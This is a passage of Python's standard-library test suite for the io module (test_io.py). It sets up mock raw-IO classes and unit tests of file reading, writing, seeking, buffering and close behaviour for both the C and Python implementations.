source
stringlengths 3
86
| python
stringlengths 75
1.04M
|
|---|---|
test_io.py
|
"""Unit tests for the io module."""
# Tests of io are scattered over the test suite:
# * test_bufio - tests file buffering
# * test_memoryio - tests BytesIO and StringIO
# * test_fileio - tests FileIO
# * test_file - tests the file interface
# * test_io - tests everything else in the io module
# * test_univnewlines - tests universal newline support
# * test_largefile - tests operations on a file greater than 2**32 bytes
# (only enabled with -ulargefile)
################################################################################
# ATTENTION TEST WRITERS!!!
################################################################################
# When writing tests for io, it's important to test both the C and Python
# implementations. This is usually done by writing a base test that refers to
# the type it is testing as an attribute. Then it provides custom subclasses to
# test both implementations. This file has lots of examples.
################################################################################
import abc
import array
import errno
import locale
import os
import pickle
import random
import signal
import sys
import time
import unittest
import warnings
import weakref
from collections import deque, UserList
from itertools import cycle, count
from test import support
from test.support.script_helper import assert_python_ok, run_python_until_end
from test.support import FakePath
import codecs
import io # C implementation of io
import _pyio as pyio # Python implementation of io
try:
import threading
except ImportError:
threading = None
try:
import ctypes
except ImportError:
def byteslike(*pos, **kw):
return array.array("b", bytes(*pos, **kw))
else:
def byteslike(*pos, **kw):
"""Create a bytes-like object having no string or sequence methods"""
data = bytes(*pos, **kw)
obj = EmptyStruct()
ctypes.resize(obj, len(data))
memoryview(obj).cast("B")[:] = data
return obj
class EmptyStruct(ctypes.Structure):
pass
def _default_chunk_size():
"""Get the default TextIOWrapper chunk size"""
with open(__file__, "r", encoding="latin-1") as f:
return f._CHUNK_SIZE
class MockRawIOWithoutRead:
"""A RawIO implementation without read(), so as to exercise the default
RawIO.read() which calls readinto()."""
def __init__(self, read_stack=()):
self._read_stack = list(read_stack)
self._write_stack = []
self._reads = 0
self._extraneous_reads = 0
def write(self, b):
self._write_stack.append(bytes(b))
return len(b)
def writable(self):
return True
def fileno(self):
return 42
def readable(self):
return True
def seekable(self):
return True
def seek(self, pos, whence):
return 0 # wrong but we gotta return something
def tell(self):
return 0 # same comment as above
def readinto(self, buf):
self._reads += 1
max_len = len(buf)
try:
data = self._read_stack[0]
except IndexError:
self._extraneous_reads += 1
return 0
if data is None:
del self._read_stack[0]
return None
n = len(data)
if len(data) <= max_len:
del self._read_stack[0]
buf[:n] = data
return n
else:
buf[:] = data[:max_len]
self._read_stack[0] = data[max_len:]
return max_len
def truncate(self, pos=None):
return pos
class CMockRawIOWithoutRead(MockRawIOWithoutRead, io.RawIOBase):
pass
class PyMockRawIOWithoutRead(MockRawIOWithoutRead, pyio.RawIOBase):
pass
class MockRawIO(MockRawIOWithoutRead):
def read(self, n=None):
self._reads += 1
try:
return self._read_stack.pop(0)
except:
self._extraneous_reads += 1
return b""
class CMockRawIO(MockRawIO, io.RawIOBase):
pass
class PyMockRawIO(MockRawIO, pyio.RawIOBase):
pass
class MisbehavedRawIO(MockRawIO):
def write(self, b):
return super().write(b) * 2
def read(self, n=None):
return super().read(n) * 2
def seek(self, pos, whence):
return -123
def tell(self):
return -456
def readinto(self, buf):
super().readinto(buf)
return len(buf) * 5
class CMisbehavedRawIO(MisbehavedRawIO, io.RawIOBase):
pass
class PyMisbehavedRawIO(MisbehavedRawIO, pyio.RawIOBase):
pass
class CloseFailureIO(MockRawIO):
closed = 0
def close(self):
if not self.closed:
self.closed = 1
raise OSError
class CCloseFailureIO(CloseFailureIO, io.RawIOBase):
pass
class PyCloseFailureIO(CloseFailureIO, pyio.RawIOBase):
pass
class MockFileIO:
def __init__(self, data):
self.read_history = []
super().__init__(data)
def read(self, n=None):
res = super().read(n)
self.read_history.append(None if res is None else len(res))
return res
def readinto(self, b):
res = super().readinto(b)
self.read_history.append(res)
return res
class CMockFileIO(MockFileIO, io.BytesIO):
pass
class PyMockFileIO(MockFileIO, pyio.BytesIO):
pass
class MockUnseekableIO:
def seekable(self):
return False
def seek(self, *args):
raise self.UnsupportedOperation("not seekable")
def tell(self, *args):
raise self.UnsupportedOperation("not seekable")
def truncate(self, *args):
raise self.UnsupportedOperation("not seekable")
class CMockUnseekableIO(MockUnseekableIO, io.BytesIO):
UnsupportedOperation = io.UnsupportedOperation
class PyMockUnseekableIO(MockUnseekableIO, pyio.BytesIO):
UnsupportedOperation = pyio.UnsupportedOperation
class MockNonBlockWriterIO:
def __init__(self):
self._write_stack = []
self._blocker_char = None
def pop_written(self):
s = b"".join(self._write_stack)
self._write_stack[:] = []
return s
def block_on(self, char):
"""Block when a given char is encountered."""
self._blocker_char = char
def readable(self):
return True
def seekable(self):
return True
def writable(self):
return True
def write(self, b):
b = bytes(b)
n = -1
if self._blocker_char:
try:
n = b.index(self._blocker_char)
except ValueError:
pass
else:
if n > 0:
# write data up to the first blocker
self._write_stack.append(b[:n])
return n
else:
# cancel blocker and indicate would block
self._blocker_char = None
return None
self._write_stack.append(b)
return len(b)
class CMockNonBlockWriterIO(MockNonBlockWriterIO, io.RawIOBase):
BlockingIOError = io.BlockingIOError
class PyMockNonBlockWriterIO(MockNonBlockWriterIO, pyio.RawIOBase):
BlockingIOError = pyio.BlockingIOError
class IOTest(unittest.TestCase):
def setUp(self):
support.unlink(support.TESTFN)
def tearDown(self):
support.unlink(support.TESTFN)
def write_ops(self, f):
self.assertEqual(f.write(b"blah."), 5)
f.truncate(0)
self.assertEqual(f.tell(), 5)
f.seek(0)
self.assertEqual(f.write(b"blah."), 5)
self.assertEqual(f.seek(0), 0)
self.assertEqual(f.write(b"Hello."), 6)
self.assertEqual(f.tell(), 6)
self.assertEqual(f.seek(-1, 1), 5)
self.assertEqual(f.tell(), 5)
buffer = bytearray(b" world\n\n\n")
self.assertEqual(f.write(buffer), 9)
buffer[:] = b"*" * 9 # Overwrite our copy of the data
self.assertEqual(f.seek(0), 0)
self.assertEqual(f.write(b"h"), 1)
self.assertEqual(f.seek(-1, 2), 13)
self.assertEqual(f.tell(), 13)
self.assertEqual(f.truncate(12), 12)
self.assertEqual(f.tell(), 13)
self.assertRaises(TypeError, f.seek, 0.0)
def read_ops(self, f, buffered=False):
data = f.read(5)
self.assertEqual(data, b"hello")
data = byteslike(data)
self.assertEqual(f.readinto(data), 5)
self.assertEqual(bytes(data), b" worl")
data = bytearray(5)
self.assertEqual(f.readinto(data), 2)
self.assertEqual(len(data), 5)
self.assertEqual(data[:2], b"d\n")
self.assertEqual(f.seek(0), 0)
self.assertEqual(f.read(20), b"hello world\n")
self.assertEqual(f.read(1), b"")
self.assertEqual(f.readinto(byteslike(b"x")), 0)
self.assertEqual(f.seek(-6, 2), 6)
self.assertEqual(f.read(5), b"world")
self.assertEqual(f.read(0), b"")
self.assertEqual(f.readinto(byteslike()), 0)
self.assertEqual(f.seek(-6, 1), 5)
self.assertEqual(f.read(5), b" worl")
self.assertEqual(f.tell(), 10)
self.assertRaises(TypeError, f.seek, 0.0)
if buffered:
f.seek(0)
self.assertEqual(f.read(), b"hello world\n")
f.seek(6)
self.assertEqual(f.read(), b"world\n")
self.assertEqual(f.read(), b"")
f.seek(0)
data = byteslike(5)
self.assertEqual(f.readinto1(data), 5)
self.assertEqual(bytes(data), b"hello")
LARGE = 2**31
def large_file_ops(self, f):
assert f.readable()
assert f.writable()
try:
self.assertEqual(f.seek(self.LARGE), self.LARGE)
except (OverflowError, ValueError):
self.skipTest("no largefile support")
self.assertEqual(f.tell(), self.LARGE)
self.assertEqual(f.write(b"xxx"), 3)
self.assertEqual(f.tell(), self.LARGE + 3)
self.assertEqual(f.seek(-1, 1), self.LARGE + 2)
self.assertEqual(f.truncate(), self.LARGE + 2)
self.assertEqual(f.tell(), self.LARGE + 2)
self.assertEqual(f.seek(0, 2), self.LARGE + 2)
self.assertEqual(f.truncate(self.LARGE + 1), self.LARGE + 1)
self.assertEqual(f.tell(), self.LARGE + 2)
self.assertEqual(f.seek(0, 2), self.LARGE + 1)
self.assertEqual(f.seek(-1, 2), self.LARGE)
self.assertEqual(f.read(2), b"x")
def test_invalid_operations(self):
# Try writing on a file opened in read mode and vice-versa.
exc = self.UnsupportedOperation
for mode in ("w", "wb"):
with self.open(support.TESTFN, mode) as fp:
self.assertRaises(exc, fp.read)
self.assertRaises(exc, fp.readline)
with self.open(support.TESTFN, "wb", buffering=0) as fp:
self.assertRaises(exc, fp.read)
self.assertRaises(exc, fp.readline)
with self.open(support.TESTFN, "rb", buffering=0) as fp:
self.assertRaises(exc, fp.write, b"blah")
self.assertRaises(exc, fp.writelines, [b"blah\n"])
with self.open(support.TESTFN, "rb") as fp:
self.assertRaises(exc, fp.write, b"blah")
self.assertRaises(exc, fp.writelines, [b"blah\n"])
with self.open(support.TESTFN, "r") as fp:
self.assertRaises(exc, fp.write, "blah")
self.assertRaises(exc, fp.writelines, ["blah\n"])
# Non-zero seeking from current or end pos
self.assertRaises(exc, fp.seek, 1, self.SEEK_CUR)
self.assertRaises(exc, fp.seek, -1, self.SEEK_END)
def test_optional_abilities(self):
# Test for OSError when optional APIs are not supported
# The purpose of this test is to try fileno(), reading, writing and
# seeking operations with various objects that indicate they do not
# support these operations.
def pipe_reader():
[r, w] = os.pipe()
os.close(w) # So that read() is harmless
return self.FileIO(r, "r")
def pipe_writer():
[r, w] = os.pipe()
self.addCleanup(os.close, r)
# Guarantee that we can write into the pipe without blocking
thread = threading.Thread(target=os.read, args=(r, 100))
thread.start()
self.addCleanup(thread.join)
return self.FileIO(w, "w")
def buffered_reader():
return self.BufferedReader(self.MockUnseekableIO())
def buffered_writer():
return self.BufferedWriter(self.MockUnseekableIO())
def buffered_random():
return self.BufferedRandom(self.BytesIO())
def buffered_rw_pair():
return self.BufferedRWPair(self.MockUnseekableIO(),
self.MockUnseekableIO())
def text_reader():
class UnseekableReader(self.MockUnseekableIO):
writable = self.BufferedIOBase.writable
write = self.BufferedIOBase.write
return self.TextIOWrapper(UnseekableReader(), "ascii")
def text_writer():
class UnseekableWriter(self.MockUnseekableIO):
readable = self.BufferedIOBase.readable
read = self.BufferedIOBase.read
return self.TextIOWrapper(UnseekableWriter(), "ascii")
tests = (
(pipe_reader, "fr"), (pipe_writer, "fw"),
(buffered_reader, "r"), (buffered_writer, "w"),
(buffered_random, "rws"), (buffered_rw_pair, "rw"),
(text_reader, "r"), (text_writer, "w"),
(self.BytesIO, "rws"), (self.StringIO, "rws"),
)
for [test, abilities] in tests:
if test is pipe_writer and not threading:
continue # Skip subtest that uses a background thread
with self.subTest(test), test() as obj:
readable = "r" in abilities
self.assertEqual(obj.readable(), readable)
writable = "w" in abilities
self.assertEqual(obj.writable(), writable)
if isinstance(obj, self.TextIOBase):
data = "3"
elif isinstance(obj, (self.BufferedIOBase, self.RawIOBase)):
data = b"3"
else:
self.fail("Unknown base class")
if "f" in abilities:
obj.fileno()
else:
self.assertRaises(OSError, obj.fileno)
if readable:
obj.read(1)
obj.read()
else:
self.assertRaises(OSError, obj.read, 1)
self.assertRaises(OSError, obj.read)
if writable:
obj.write(data)
else:
self.assertRaises(OSError, obj.write, data)
if sys.platform.startswith("win") and test in (
pipe_reader, pipe_writer):
# Pipes seem to appear as seekable on Windows
continue
seekable = "s" in abilities
self.assertEqual(obj.seekable(), seekable)
if seekable:
obj.tell()
obj.seek(0)
else:
self.assertRaises(OSError, obj.tell)
self.assertRaises(OSError, obj.seek, 0)
if writable and seekable:
obj.truncate()
obj.truncate(0)
else:
self.assertRaises(OSError, obj.truncate)
self.assertRaises(OSError, obj.truncate, 0)
def test_open_handles_NUL_chars(self):
fn_with_NUL = 'foo\0bar'
self.assertRaises(ValueError, self.open, fn_with_NUL, 'w')
bytes_fn = bytes(fn_with_NUL, 'ascii')
with warnings.catch_warnings():
warnings.simplefilter("ignore", DeprecationWarning)
self.assertRaises(ValueError, self.open, bytes_fn, 'w')
def test_raw_file_io(self):
with self.open(support.TESTFN, "wb", buffering=0) as f:
self.assertEqual(f.readable(), False)
self.assertEqual(f.writable(), True)
self.assertEqual(f.seekable(), True)
self.write_ops(f)
with self.open(support.TESTFN, "rb", buffering=0) as f:
self.assertEqual(f.readable(), True)
self.assertEqual(f.writable(), False)
self.assertEqual(f.seekable(), True)
self.read_ops(f)
def test_buffered_file_io(self):
with self.open(support.TESTFN, "wb") as f:
self.assertEqual(f.readable(), False)
self.assertEqual(f.writable(), True)
self.assertEqual(f.seekable(), True)
self.write_ops(f)
with self.open(support.TESTFN, "rb") as f:
self.assertEqual(f.readable(), True)
self.assertEqual(f.writable(), False)
self.assertEqual(f.seekable(), True)
self.read_ops(f, True)
def test_readline(self):
with self.open(support.TESTFN, "wb") as f:
f.write(b"abc\ndef\nxyzzy\nfoo\x00bar\nanother line")
with self.open(support.TESTFN, "rb") as f:
self.assertEqual(f.readline(), b"abc\n")
self.assertEqual(f.readline(10), b"def\n")
self.assertEqual(f.readline(2), b"xy")
self.assertEqual(f.readline(4), b"zzy\n")
self.assertEqual(f.readline(), b"foo\x00bar\n")
self.assertEqual(f.readline(None), b"another line")
self.assertRaises(TypeError, f.readline, 5.3)
with self.open(support.TESTFN, "r") as f:
self.assertRaises(TypeError, f.readline, 5.3)
def test_readline_nonsizeable(self):
# Issue #30061
# Crash when readline() returns an object without __len__
class R(self.IOBase):
def readline(self):
return None
self.assertRaises((TypeError, StopIteration), next, R())
def test_next_nonsizeable(self):
# Issue #30061
# Crash when __next__() returns an object without __len__
class R(self.IOBase):
def __next__(self):
return None
self.assertRaises(TypeError, R().readlines, 1)
def test_raw_bytes_io(self):
f = self.BytesIO()
self.write_ops(f)
data = f.getvalue()
self.assertEqual(data, b"hello world\n")
f = self.BytesIO(data)
self.read_ops(f, True)
def test_large_file_ops(self):
# On Windows and Mac OSX this test consumes large resources; It takes
# a long time to build the >2 GiB file and takes >2 GiB of disk space
# therefore the resource must be enabled to run this test.
if sys.platform[:3] == 'win' or sys.platform == 'darwin':
support.requires(
'largefile',
'test requires %s bytes and a long time to run' % self.LARGE)
with self.open(support.TESTFN, "w+b", 0) as f:
self.large_file_ops(f)
with self.open(support.TESTFN, "w+b") as f:
self.large_file_ops(f)
def test_with_open(self):
for bufsize in (0, 1, 100):
f = None
with self.open(support.TESTFN, "wb", bufsize) as f:
f.write(b"xxx")
self.assertEqual(f.closed, True)
f = None
try:
with self.open(support.TESTFN, "wb", bufsize) as f:
1/0
except ZeroDivisionError:
self.assertEqual(f.closed, True)
else:
self.fail("1/0 didn't raise an exception")
# issue 5008
def test_append_mode_tell(self):
with self.open(support.TESTFN, "wb") as f:
f.write(b"xxx")
with self.open(support.TESTFN, "ab", buffering=0) as f:
self.assertEqual(f.tell(), 3)
with self.open(support.TESTFN, "ab") as f:
self.assertEqual(f.tell(), 3)
with self.open(support.TESTFN, "a") as f:
self.assertGreater(f.tell(), 0)
def test_destructor(self):
record = []
class MyFileIO(self.FileIO):
def __del__(self):
record.append(1)
try:
f = super().__del__
except AttributeError:
pass
else:
f()
def close(self):
record.append(2)
super().close()
def flush(self):
record.append(3)
super().flush()
with support.check_warnings(('', ResourceWarning)):
f = MyFileIO(support.TESTFN, "wb")
f.write(b"xxx")
del f
support.gc_collect()
self.assertEqual(record, [1, 2, 3])
with self.open(support.TESTFN, "rb") as f:
self.assertEqual(f.read(), b"xxx")
def _check_base_destructor(self, base):
record = []
class MyIO(base):
def __init__(self):
# This exercises the availability of attributes on object
# destruction.
# (in the C version, close() is called by the tp_dealloc
# function, not by __del__)
self.on_del = 1
self.on_close = 2
self.on_flush = 3
def __del__(self):
record.append(self.on_del)
try:
f = super().__del__
except AttributeError:
pass
else:
f()
def close(self):
record.append(self.on_close)
super().close()
def flush(self):
record.append(self.on_flush)
super().flush()
f = MyIO()
del f
support.gc_collect()
self.assertEqual(record, [1, 2, 3])
def test_IOBase_destructor(self):
self._check_base_destructor(self.IOBase)
def test_RawIOBase_destructor(self):
self._check_base_destructor(self.RawIOBase)
def test_BufferedIOBase_destructor(self):
self._check_base_destructor(self.BufferedIOBase)
def test_TextIOBase_destructor(self):
self._check_base_destructor(self.TextIOBase)
def test_close_flushes(self):
with self.open(support.TESTFN, "wb") as f:
f.write(b"xxx")
with self.open(support.TESTFN, "rb") as f:
self.assertEqual(f.read(), b"xxx")
def test_array_writes(self):
a = array.array('i', range(10))
n = len(a.tobytes())
def check(f):
with f:
self.assertEqual(f.write(a), n)
f.writelines((a,))
check(self.BytesIO())
check(self.FileIO(support.TESTFN, "w"))
check(self.BufferedWriter(self.MockRawIO()))
check(self.BufferedRandom(self.MockRawIO()))
check(self.BufferedRWPair(self.MockRawIO(), self.MockRawIO()))
def test_closefd(self):
self.assertRaises(ValueError, self.open, support.TESTFN, 'w',
closefd=False)
def test_read_closed(self):
with self.open(support.TESTFN, "w") as f:
f.write("egg\n")
with self.open(support.TESTFN, "r") as f:
file = self.open(f.fileno(), "r", closefd=False)
self.assertEqual(file.read(), "egg\n")
file.seek(0)
file.close()
self.assertRaises(ValueError, file.read)
def test_no_closefd_with_filename(self):
# can't use closefd in combination with a file name
self.assertRaises(ValueError, self.open, support.TESTFN, "r", closefd=False)
def test_closefd_attr(self):
with self.open(support.TESTFN, "wb") as f:
f.write(b"egg\n")
with self.open(support.TESTFN, "r") as f:
self.assertEqual(f.buffer.raw.closefd, True)
file = self.open(f.fileno(), "r", closefd=False)
self.assertEqual(file.buffer.raw.closefd, False)
def test_garbage_collection(self):
# FileIO objects are collected, and collecting them flushes
# all data to disk.
with support.check_warnings(('', ResourceWarning)):
f = self.FileIO(support.TESTFN, "wb")
f.write(b"abcxxx")
f.f = f
wr = weakref.ref(f)
del f
support.gc_collect()
self.assertIsNone(wr(), wr)
with self.open(support.TESTFN, "rb") as f:
self.assertEqual(f.read(), b"abcxxx")
def test_unbounded_file(self):
# Issue #1174606: reading from an unbounded stream such as /dev/zero.
zero = "/dev/zero"
if not os.path.exists(zero):
self.skipTest("{0} does not exist".format(zero))
if sys.maxsize > 0x7FFFFFFF:
self.skipTest("test can only run in a 32-bit address space")
if support.real_max_memuse < support._2G:
self.skipTest("test requires at least 2GB of memory")
with self.open(zero, "rb", buffering=0) as f:
self.assertRaises(OverflowError, f.read)
with self.open(zero, "rb") as f:
self.assertRaises(OverflowError, f.read)
with self.open(zero, "r") as f:
self.assertRaises(OverflowError, f.read)
def check_flush_error_on_close(self, *args, **kwargs):
# Test that the file is closed despite failed flush
# and that flush() is called before file closed.
f = self.open(*args, **kwargs)
closed = []
def bad_flush():
closed[:] = [f.closed]
raise OSError()
f.flush = bad_flush
self.assertRaises(OSError, f.close) # exception not swallowed
self.assertTrue(f.closed)
self.assertTrue(closed) # flush() called
self.assertFalse(closed[0]) # flush() called before file closed
f.flush = lambda: None # break reference loop
def test_flush_error_on_close(self):
# raw file
# Issue #5700: io.FileIO calls flush() after file closed
self.check_flush_error_on_close(support.TESTFN, 'wb', buffering=0)
fd = os.open(support.TESTFN, os.O_WRONLY|os.O_CREAT)
self.check_flush_error_on_close(fd, 'wb', buffering=0)
fd = os.open(support.TESTFN, os.O_WRONLY|os.O_CREAT)
self.check_flush_error_on_close(fd, 'wb', buffering=0, closefd=False)
os.close(fd)
# buffered io
self.check_flush_error_on_close(support.TESTFN, 'wb')
fd = os.open(support.TESTFN, os.O_WRONLY|os.O_CREAT)
self.check_flush_error_on_close(fd, 'wb')
fd = os.open(support.TESTFN, os.O_WRONLY|os.O_CREAT)
self.check_flush_error_on_close(fd, 'wb', closefd=False)
os.close(fd)
# text io
self.check_flush_error_on_close(support.TESTFN, 'w')
fd = os.open(support.TESTFN, os.O_WRONLY|os.O_CREAT)
self.check_flush_error_on_close(fd, 'w')
fd = os.open(support.TESTFN, os.O_WRONLY|os.O_CREAT)
self.check_flush_error_on_close(fd, 'w', closefd=False)
os.close(fd)
def test_multi_close(self):
f = self.open(support.TESTFN, "wb", buffering=0)
f.close()
f.close()
f.close()
self.assertRaises(ValueError, f.flush)
def test_RawIOBase_read(self):
# Exercise the default limited RawIOBase.read(n) implementation (which
# calls readinto() internally).
rawio = self.MockRawIOWithoutRead((b"abc", b"d", None, b"efg", None))
self.assertEqual(rawio.read(2), b"ab")
self.assertEqual(rawio.read(2), b"c")
self.assertEqual(rawio.read(2), b"d")
self.assertEqual(rawio.read(2), None)
self.assertEqual(rawio.read(2), b"ef")
self.assertEqual(rawio.read(2), b"g")
self.assertEqual(rawio.read(2), None)
self.assertEqual(rawio.read(2), b"")
def test_types_have_dict(self):
test = (
self.IOBase(),
self.RawIOBase(),
self.TextIOBase(),
self.StringIO(),
self.BytesIO()
)
for obj in test:
self.assertTrue(hasattr(obj, "__dict__"))
def test_opener(self):
with self.open(support.TESTFN, "w") as f:
f.write("egg\n")
fd = os.open(support.TESTFN, os.O_RDONLY)
def opener(path, flags):
return fd
with self.open("non-existent", "r", opener=opener) as f:
self.assertEqual(f.read(), "egg\n")
def test_bad_opener_negative_1(self):
# Issue #27066.
def badopener(fname, flags):
return -1
with self.assertRaises(ValueError) as cm:
open('non-existent', 'r', opener=badopener)
self.assertEqual(str(cm.exception), 'opener returned -1')
def test_bad_opener_other_negative(self):
# Issue #27066.
def badopener(fname, flags):
return -2
with self.assertRaises(ValueError) as cm:
open('non-existent', 'r', opener=badopener)
self.assertEqual(str(cm.exception), 'opener returned -2')
def test_fileio_closefd(self):
# Issue #4841
with self.open(__file__, 'rb') as f1, \
self.open(__file__, 'rb') as f2:
fileio = self.FileIO(f1.fileno(), closefd=False)
# .__init__() must not close f1
fileio.__init__(f2.fileno(), closefd=False)
f1.readline()
# .close() must not close f2
fileio.close()
f2.readline()
def test_nonbuffered_textio(self):
with support.check_no_resource_warning(self):
with self.assertRaises(ValueError):
self.open(support.TESTFN, 'w', buffering=0)
def test_invalid_newline(self):
with support.check_no_resource_warning(self):
with self.assertRaises(ValueError):
self.open(support.TESTFN, 'w', newline='invalid')
def test_buffered_readinto_mixin(self):
# Test the implementation provided by BufferedIOBase
class Stream(self.BufferedIOBase):
def read(self, size):
return b"12345"
read1 = read
stream = Stream()
for method in ("readinto", "readinto1"):
with self.subTest(method):
buffer = byteslike(5)
self.assertEqual(getattr(stream, method)(buffer), 5)
self.assertEqual(bytes(buffer), b"12345")
def test_fspath_support(self):
def check_path_succeeds(path):
with self.open(path, "w") as f:
f.write("egg\n")
with self.open(path, "r") as f:
self.assertEqual(f.read(), "egg\n")
check_path_succeeds(FakePath(support.TESTFN))
check_path_succeeds(FakePath(support.TESTFN.encode('utf-8')))
with self.open(support.TESTFN, "w") as f:
bad_path = FakePath(f.fileno())
with self.assertRaises(TypeError):
self.open(bad_path, 'w')
bad_path = FakePath(None)
with self.assertRaises(TypeError):
self.open(bad_path, 'w')
bad_path = FakePath(FloatingPointError)
with self.assertRaises(FloatingPointError):
self.open(bad_path, 'w')
# ensure that refcounting is correct with some error conditions
with self.assertRaisesRegex(ValueError, 'read/write/append mode'):
self.open(FakePath(support.TESTFN), 'rwxa')
def test_RawIOBase_readall(self):
# Exercise the default unlimited RawIOBase.read() and readall()
# implementations.
rawio = self.MockRawIOWithoutRead((b"abc", b"d", b"efg"))
self.assertEqual(rawio.read(), b"abcdefg")
rawio = self.MockRawIOWithoutRead((b"abc", b"d", b"efg"))
self.assertEqual(rawio.readall(), b"abcdefg")
def test_BufferedIOBase_readinto(self):
# Exercise the default BufferedIOBase.readinto() and readinto1()
# implementations (which call read() or read1() internally).
class Reader(self.BufferedIOBase):
def __init__(self, avail):
self.avail = avail
def read(self, size):
result = self.avail[:size]
self.avail = self.avail[size:]
return result
def read1(self, size):
"""Returns no more than 5 bytes at once"""
return self.read(min(size, 5))
tests = (
# (test method, total data available, read buffer size, expected
# read size)
("readinto", 10, 5, 5),
("readinto", 10, 6, 6), # More than read1() can return
("readinto", 5, 6, 5), # Buffer larger than total available
("readinto", 6, 7, 6),
("readinto", 10, 0, 0), # Empty buffer
("readinto1", 10, 5, 5), # Result limited to single read1() call
("readinto1", 10, 6, 5), # Buffer larger than read1() can return
("readinto1", 5, 6, 5), # Buffer larger than total available
("readinto1", 6, 7, 5),
("readinto1", 10, 0, 0), # Empty buffer
)
UNUSED_BYTE = 0x81
for test in tests:
with self.subTest(test):
method, avail, request, result = test
reader = Reader(bytes(range(avail)))
buffer = bytearray((UNUSED_BYTE,) * request)
method = getattr(reader, method)
self.assertEqual(method(buffer), result)
self.assertEqual(len(buffer), request)
self.assertSequenceEqual(buffer[:result], range(result))
unused = (UNUSED_BYTE,) * (request - result)
self.assertSequenceEqual(buffer[result:], unused)
self.assertEqual(len(reader.avail), avail - result)
class CIOTest(IOTest):
def test_IOBase_finalize(self):
# Issue #12149: segmentation fault on _PyIOBase_finalize when both a
# class which inherits IOBase and an object of this class are caught
# in a reference cycle and close() is already in the method cache.
class MyIO(self.IOBase):
def close(self):
pass
# create an instance to populate the method cache
MyIO()
obj = MyIO()
obj.obj = obj
wr = weakref.ref(obj)
del MyIO
del obj
support.gc_collect()
self.assertIsNone(wr(), wr)
class PyIOTest(IOTest):
pass
@support.cpython_only
class APIMismatchTest(unittest.TestCase):
def test_RawIOBase_io_in_pyio_match(self):
"""Test that pyio RawIOBase class has all c RawIOBase methods"""
mismatch = support.detect_api_mismatch(pyio.RawIOBase, io.RawIOBase,
ignore=('__weakref__',))
self.assertEqual(mismatch, set(), msg='Python RawIOBase does not have all C RawIOBase methods')
def test_RawIOBase_pyio_in_io_match(self):
"""Test that c RawIOBase class has all pyio RawIOBase methods"""
mismatch = support.detect_api_mismatch(io.RawIOBase, pyio.RawIOBase)
self.assertEqual(mismatch, set(), msg='C RawIOBase does not have all Python RawIOBase methods')
class CommonBufferedTests:
# Tests common to BufferedReader, BufferedWriter and BufferedRandom
def test_detach(self):
raw = self.MockRawIO()
buf = self.tp(raw)
self.assertIs(buf.detach(), raw)
self.assertRaises(ValueError, buf.detach)
repr(buf) # Should still work
def test_fileno(self):
rawio = self.MockRawIO()
bufio = self.tp(rawio)
self.assertEqual(42, bufio.fileno())
def test_invalid_args(self):
rawio = self.MockRawIO()
bufio = self.tp(rawio)
# Invalid whence
self.assertRaises(ValueError, bufio.seek, 0, -1)
self.assertRaises(ValueError, bufio.seek, 0, 9)
def test_override_destructor(self):
tp = self.tp
record = []
class MyBufferedIO(tp):
def __del__(self):
record.append(1)
try:
f = super().__del__
except AttributeError:
pass
else:
f()
def close(self):
record.append(2)
super().close()
def flush(self):
record.append(3)
super().flush()
rawio = self.MockRawIO()
bufio = MyBufferedIO(rawio)
del bufio
support.gc_collect()
self.assertEqual(record, [1, 2, 3])
def test_context_manager(self):
# Test usability as a context manager
rawio = self.MockRawIO()
bufio = self.tp(rawio)
def _with():
with bufio:
pass
_with()
# bufio should now be closed, and using it a second time should raise
# a ValueError.
self.assertRaises(ValueError, _with)
def test_error_through_destructor(self):
# Test that the exception state is not modified by a destructor,
# even if close() fails.
rawio = self.CloseFailureIO()
def f():
self.tp(rawio).xyzzy
with support.captured_output("stderr") as s:
self.assertRaises(AttributeError, f)
s = s.getvalue().strip()
if s:
# The destructor *may* have printed an unraisable error, check it
self.assertEqual(len(s.splitlines()), 1)
self.assertTrue(s.startswith("Exception OSError: "), s)
self.assertTrue(s.endswith(" ignored"), s)
def test_repr(self):
raw = self.MockRawIO()
b = self.tp(raw)
clsname = "%s.%s" % (self.tp.__module__, self.tp.__qualname__)
self.assertEqual(repr(b), "<%s>" % clsname)
raw.name = "dummy"
self.assertEqual(repr(b), "<%s name='dummy'>" % clsname)
raw.name = b"dummy"
self.assertEqual(repr(b), "<%s name=b'dummy'>" % clsname)
def test_recursive_repr(self):
# Issue #25455
raw = self.MockRawIO()
b = self.tp(raw)
with support.swap_attr(raw, 'name', b):
try:
repr(b) # Should not crash
except RuntimeError:
pass
def test_flush_error_on_close(self):
# Test that buffered file is closed despite failed flush
# and that flush() is called before file closed.
raw = self.MockRawIO()
closed = []
def bad_flush():
closed[:] = [b.closed, raw.closed]
raise OSError()
raw.flush = bad_flush
b = self.tp(raw)
self.assertRaises(OSError, b.close) # exception not swallowed
self.assertTrue(b.closed)
self.assertTrue(raw.closed)
self.assertTrue(closed) # flush() called
self.assertFalse(closed[0]) # flush() called before file closed
self.assertFalse(closed[1])
raw.flush = lambda: None # break reference loop
def test_close_error_on_close(self):
raw = self.MockRawIO()
def bad_flush():
raise OSError('flush')
def bad_close():
raise OSError('close')
raw.close = bad_close
b = self.tp(raw)
b.flush = bad_flush
with self.assertRaises(OSError) as err: # exception not swallowed
b.close()
self.assertEqual(err.exception.args, ('close',))
self.assertIsInstance(err.exception.__context__, OSError)
self.assertEqual(err.exception.__context__.args, ('flush',))
self.assertFalse(b.closed)
def test_nonnormalized_close_error_on_close(self):
# Issue #21677
raw = self.MockRawIO()
def bad_flush():
raise non_existing_flush
def bad_close():
raise non_existing_close
raw.close = bad_close
b = self.tp(raw)
b.flush = bad_flush
with self.assertRaises(NameError) as err: # exception not swallowed
b.close()
self.assertIn('non_existing_close', str(err.exception))
self.assertIsInstance(err.exception.__context__, NameError)
self.assertIn('non_existing_flush', str(err.exception.__context__))
self.assertFalse(b.closed)
def test_multi_close(self):
raw = self.MockRawIO()
b = self.tp(raw)
b.close()
b.close()
b.close()
self.assertRaises(ValueError, b.flush)
def test_unseekable(self):
bufio = self.tp(self.MockUnseekableIO(b"A" * 10))
self.assertRaises(self.UnsupportedOperation, bufio.tell)
self.assertRaises(self.UnsupportedOperation, bufio.seek, 0)
def test_readonly_attributes(self):
raw = self.MockRawIO()
buf = self.tp(raw)
x = self.MockRawIO()
with self.assertRaises(AttributeError):
buf.raw = x
class SizeofTest:
@support.cpython_only
def test_sizeof(self):
bufsize1 = 4096
bufsize2 = 8192
rawio = self.MockRawIO()
bufio = self.tp(rawio, buffer_size=bufsize1)
size = sys.getsizeof(bufio) - bufsize1
rawio = self.MockRawIO()
bufio = self.tp(rawio, buffer_size=bufsize2)
self.assertEqual(sys.getsizeof(bufio), size + bufsize2)
@support.cpython_only
